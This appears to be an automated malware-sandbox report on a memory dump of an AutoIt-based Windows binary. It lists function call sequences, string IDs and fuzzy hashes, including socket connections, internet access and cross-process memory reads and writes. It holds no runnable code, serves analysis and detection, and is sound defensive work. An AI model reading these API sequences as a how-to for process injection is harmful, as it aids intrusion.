                                                                            • Instruction ID: 9dd0f7462c92bced1e73672d31506da2e7f4eac6bb9937f29a64c43ca840c06e
                                                                            • Opcode Fuzzy Hash: 6d7be263176cf817af3e4401dba2673fc79a46e8372efdd9af5d1d58e4d3bc93
                                                                            • Instruction Fuzzy Hash: C63184719002189BDB24DF59EC81EDEB378FF94720F10825AF918D7284E7B1DA95CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1786fdbb9705d58e8c684bbe5c3b14cb4cee3fed2422046b45cc73f16966d539
                                                                            • Instruction ID: f1b6b015714adbec694c827f535f7fc4d33f65a0e95601640cbba8f8336ce4a9
                                                                            • Opcode Fuzzy Hash: 1786fdbb9705d58e8c684bbe5c3b14cb4cee3fed2422046b45cc73f16966d539
                                                                            • Instruction Fuzzy Hash: 07219A75204A019BCB10EF29D8D4D6BB7A8FF99360B044669FD51C73A5EB30EC05CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00894E62: inet_addr.WSOCK32(?), ref: 00894E86
                                                                            • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0089503B
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0089504A
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00895083
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 008950AA
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 008950BE
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 245547762-0
                                                                            • Opcode ID: e8f1018c4bb096903c3eae8c1730c25c765aacc2a74f651a8189115a052636ee
                                                                            • Instruction ID: f69eabcc02c288496decd0e986aac73e12ce6ee519b878c755cd76a99721a2a8
                                                                            • Opcode Fuzzy Hash: e8f1018c4bb096903c3eae8c1730c25c765aacc2a74f651a8189115a052636ee
                                                                            • Instruction Fuzzy Hash: 28219D322005009FC710FF6CDC4AF6EB7A8FF85720F148649F845E7291CBB0A8418B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 008770FC
                                                                            • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
                                                                            • SelectObject.GDI32(?,00000000), ref: 0087714C
                                                                            • BeginPath.GDI32(?), ref: 00877161
                                                                            • SelectObject.GDI32(?,00000000), ref: 0087718A
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Object$Select$BeginCreateDeletePath
                                                                            • String ID:
                                                                            • API String ID: 2338827641-0
                                                                            • Opcode ID: a5b84029ad94a98fab6a5011093af2b0a3457dfe03ddd562d484c84b5e1a7e5b
                                                                            • Instruction ID: 9998339ad8fe2047b1ea6aa25120efda115454c00b9a3c39aa19d4b74dedb28d
                                                                            • Opcode Fuzzy Hash: a5b84029ad94a98fab6a5011093af2b0a3457dfe03ddd562d484c84b5e1a7e5b
                                                                            • Instruction Fuzzy Hash: ED218071806215EBCB11DF69EC48A9A7BACFB24320F148317F928D32A0DB30D841CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00841810: _doexit.LIBCMT ref: 0084181C
                                                                            • ___set_flsgetvalue.LIBCMT ref: 008450E0
                                                                              • Part of subcall function 008477D1: TlsGetValue.KERNEL32(?,0084792A,?,008412DC,?,00000001), ref: 008477DA
                                                                              • Part of subcall function 008477D1: TlsSetValue.KERNEL32(00000000,?,008412DC,?,00000001), ref: 008477FB
                                                                            • ___fls_getvalue@4.LIBCMT ref: 008450EB
                                                                              • Part of subcall function 008477B1: TlsGetValue.KERNEL32(?,?,00843C50,00000000), ref: 008477BF
                                                                            • ___fls_setvalue@8.LIBCMT ref: 008450FD
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 00845106
                                                                            • ExitThread.KERNEL32 ref: 0084510D
                                                                            • __freefls@4.LIBCMT ref: 00845129
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                            • String ID:
                                                                            • API String ID: 4247068974-0
                                                                            • Opcode ID: 1ce946c575b9dd0f4408ca69c865e3b8b3ae7c18b1f17b7f56d22af486346cd1
                                                                            • Instruction ID: 94879245c828b1b1b9498f9f305175ad97d8ae90562f059bc07bc0d74f4605c0
                                                                            • Opcode Fuzzy Hash: 1ce946c575b9dd0f4408ca69c865e3b8b3ae7c18b1f17b7f56d22af486346cd1
                                                                            • Instruction Fuzzy Hash: BDE0EC3580420D6BDF1037F99D1EA5E7A6DFE08744B510820BA10E2137EF2888618663
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: )$U$\
                                                                            • API String ID: 0-3705770531
                                                                            • Opcode ID: 58c396340462427835f3f1434386d3f16142e24c437a5ca17cb664bac50afbbc
                                                                            • Instruction ID: daf2d53de8921268da3ce60401e0f512e1c2c10dfd9b362ede410098338afe08
                                                                            • Opcode Fuzzy Hash: 58c396340462427835f3f1434386d3f16142e24c437a5ca17cb664bac50afbbc
                                                                            • Instruction Fuzzy Hash: 0AC1B070A04209CFCB15CF6AC5806ADBBF2FF99304F24C1AAC95ADB259D7319946CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            • Opcode ID: a16cccd73643797297571de6a24c8445033b37617175d913161087740615248b
                                                                            • Instruction ID: b7fc8ddaba55b93c1ecf267cc90e62febb5d8f5bdb84d68512d891fe484f0b6d
                                                                            • Opcode Fuzzy Hash: a16cccd73643797297571de6a24c8445033b37617175d913161087740615248b
                                                                            • Instruction Fuzzy Hash: 6FB1AB70D04258CFCB19CFA8C8907ADBBB2FF59308F2881A9D059EB399D7759942CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            • Opcode ID: 04201e1f9d40ea653221d69ff468ba7a83748985058a0327f7c689b10779001c
                                                                            • Instruction ID: 1d3f63889f5c7d611afc6f8865402084764bf64cf6580b1ae780d9264c62b325
                                                                            • Opcode Fuzzy Hash: 04201e1f9d40ea653221d69ff468ba7a83748985058a0327f7c689b10779001c
                                                                            • Instruction Fuzzy Hash: 22B1AC70D04258CFCB19CFA8C8907ADBBB2FF59308F2881A9D059EB399C7759942CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00872654: _wcslen.LIBCMT ref: 00872680
                                                                            • CoInitialize.OLE32(00000000), ref: 008A83FC
                                                                            • CoCreateInstance.OLE32(008B2A08,00000000,00000001,008B28A8,?), ref: 008A8415
                                                                            • CoUninitialize.OLE32 ref: 008A85F6
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                            • String ID: .lnk
                                                                            • API String ID: 886957087-24824748
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00864300: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00864331
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00866579
                                                                              • Part of subcall function 008642C4: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 008642F5
                                                                              • Part of subcall function 00864394: GetWindowThreadProcessId.USER32(?,?), ref: 008643C7
                                                                              • Part of subcall function 00864394: OpenProcess.KERNEL32(00000438,00000000,?), ref: 008643D8
                                                                              • Part of subcall function 00864394: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 008643EF
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008665E9
                                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00866669
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \$]$h
                                                                            • API String ID: 4104443479-3262404753
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00865244
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00865293
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 008652C2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                            • String ID: crts
                                                                            • API String ID: 943502515-3724388283
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0086120B
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 0086121D
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpSendEcho
                                                                            • API String ID: 2574300362-58917771
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0086123D
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0086124F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpCloseHandle
                                                                            • API String ID: 2574300362-3530519716
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 0086126F
                                                                            • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00861281
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: ICMP.DLL$IcmpCreateFile
                                                                            • API String ID: 2574300362-275556492
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • SetErrorMode.KERNEL32 ref: 008A8188
                                                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008A8341
                                                                              • Part of subcall function 0086397D: GetFileAttributesW.KERNELBASE(?), ref: 00863984
                                                                            • SetErrorMode.KERNEL32(?), ref: 008A822A
                                                                            • SetErrorMode.KERNEL32(?), ref: 008A82FA
                                                                            Similarity
                                                                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                            • String ID:
                                                                            • API String ID: 3884216118-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 008A94C9
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 008A9592
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 008A95C9
                                                                            • VariantClear.OLEAUT32(?), ref: 008A960A
                                                                            Similarity
                                                                            • API ID: Variant$AllocClearCopyInitString
                                                                            • String ID:
                                                                            • API String ID: 2808897238-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                            • String ID:
                                                                            • API String ID: 2782032738-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1352109105-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0088D235
                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0088D259
                                                                            • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0088D279
                                                                            • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0088D297
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 3321077145-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0088033E
                                                                            • DefDlgProcW.USER32(?,00000138,?,?), ref: 0088038D
                                                                            • DefDlgProcW.USER32(?,00000133,?,?), ref: 008803DC
                                                                            • DefDlgProcW.USER32(?,00000134,?,?), ref: 0088040D
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Proc$Parent
                                                                            • String ID:
                                                                            • API String ID: 2351499541-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00860593: _wcspbrk.LIBCMT ref: 008605A3
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 008793D0
                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00879460
                                                                            • _wcslen.LIBCMT ref: 00879472
                                                                            • _wcslen.LIBCMT ref: 0087947F
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 2886238975-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 008A4356
                                                                              • Part of subcall function 008738C5: GetWindowThreadProcessId.USER32(?,00000000), ref: 008738E8
                                                                              • Part of subcall function 008738C5: GetCurrentThreadId.KERNEL32 ref: 008738EF
                                                                              • Part of subcall function 008738C5: AttachThreadInput.USER32(00000000), ref: 008738F6
                                                                            • GetCaretPos.USER32(?), ref: 008A436C
                                                                            • ClientToScreen.USER32 ref: 008A43A2
                                                                            • GetForegroundWindow.USER32 ref: 008A43A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0089F356: IsWindow.USER32(00000000), ref: 0089F386
                                                                            • GetWindowLongW.USER32 ref: 008AA299
                                                                            • SetWindowLongW.USER32 ref: 008AA2B4
                                                                            • SetWindowLongW.USER32 ref: 008AA2CC
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 008AA2DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateWindowExW.USER32 ref: 008601AF
                                                                            • GetStockObject.GDI32(00000011), ref: 008601C5
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 008601CF
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 008601EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                            • String ID:
                                                                            • API String ID: 1358664141-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 008770BF: DeleteObject.GDI32(00000000), ref: 008770FC
                                                                              • Part of subcall function 008770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
                                                                              • Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087714C
                                                                              • Part of subcall function 008770BF: BeginPath.GDI32(?), ref: 00877161
                                                                              • Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087718A
                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0087723B
                                                                            • LineTo.GDI32(?,?,?), ref: 0087724A
                                                                            • EndPath.GDI32(?), ref: 0087725A
                                                                            • StrokePath.GDI32(?), ref: 00877268
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                            • String ID:
                                                                            • API String ID: 2783949968-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32 ref: 00866425
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00866438
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0086643F
                                                                            • AttachThreadInput.USER32(00000000), ref: 00866446
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 2710830443-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __getptd_noexit.LIBCMT ref: 00845070
                                                                              • Part of subcall function 00847913: GetLastError.KERNEL32(00000003,?,00847994,?,00841259,?,?,008412DC,?,00000001), ref: 00847917
                                                                              • Part of subcall function 00847913: ___set_flsgetvalue.LIBCMT ref: 00847925
                                                                              • Part of subcall function 00847913: __calloc_crt.LIBCMT ref: 00847939
                                                                              • Part of subcall function 00847913: GetCurrentThreadId.KERNEL32 ref: 00847969
                                                                              • Part of subcall function 00847913: SetLastError.KERNEL32(00000000,?,008412DC,?,00000001), ref: 00847981
                                                                            • CloseHandle.KERNEL32(?,?,008450BB), ref: 00845084
                                                                            • __freeptd.LIBCMT ref: 0084508B
                                                                            • ExitThread.KERNEL32 ref: 00845093
                                                                            Similarity
                                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1454798553-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _strncmp
                                                                            • String ID: Q\E
                                                                            • API String ID: 909875538-2189900498
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove_strncmp
                                                                            • String ID: U$\
                                                                            • API String ID: 2666721431-100911408
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0083F260: _wcslen.LIBCMT ref: 0083F262
                                                                              • Part of subcall function 0083F260: _wcscpy.LIBCMT ref: 0083F282
                                                                            • __wcsnicmp.LIBCMT ref: 008963D5
                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0089647B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                            • String ID: LPT
                                                                            • API String ID: 3035604524-1350329615
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: \
                                                                            • API String ID: 4104443479-2967466578
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0087839F
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 008783B8
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • _strlen.LIBCMT ref: 0083F548
                                                                              • Part of subcall function 0083F570: _memmove.LIBCMT ref: 0083F5B9
                                                                              • Part of subcall function 0083F570: _memmove.LIBCMT ref: 0083F5D3
                                                                            • _sprintf.LIBCMT ref: 0083F69E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _memmove$_sprintf_strlen
                                                                            • String ID: %02X
                                                                            • API String ID: 1921645428-436463671
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 008812C0
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008812D0
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0087257F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: <local>
                                                                            • API String ID: 2038078732-4266983199
                                                                            • Opcode ID: c3f0871c4460e822515382201f8b768e0b4cad77f8da4d1f4f73f617fbf0f43e
                                                                            • Instruction ID: a059deb2338c7c6ec6daa16f1e5ea0d8db0e13c33994889a8edf4bd4b974a4f3
                                                                            • Opcode Fuzzy Hash: c3f0871c4460e822515382201f8b768e0b4cad77f8da4d1f4f73f617fbf0f43e
                                                                            • Instruction Fuzzy Hash: F811C270680314ABE774CA548C66FBAB3A8FB11B04F20C10AF94AEB6C4D6B0F944D751
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
                                                                              • Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 008990EB
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend_memmove_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 547829025-1403004172
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: __fread_nolock_memmove
                                                                            • String ID: EA06
                                                                            • API String ID: 1988441806-3962188686
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 00886075
                                                                              • Part of subcall function 008414F7: _malloc.LIBCMT ref: 00841511
                                                                            • wsprintfW.USER32 ref: 008860A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessageSend_mallocwsprintf
                                                                            • String ID: %d/%02d/%02d
                                                                            • API String ID: 1262938277-328681919
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00867058
                                                                              • Part of subcall function 008417FA: _doexit.LIBCMT ref: 00841806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
                                                                            • Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp
                                                                            • Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Message_doexit
                                                                            • String ID: AutoIt$Error allocating memory.
                                                                            • API String ID: 1993061046-4017498283
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%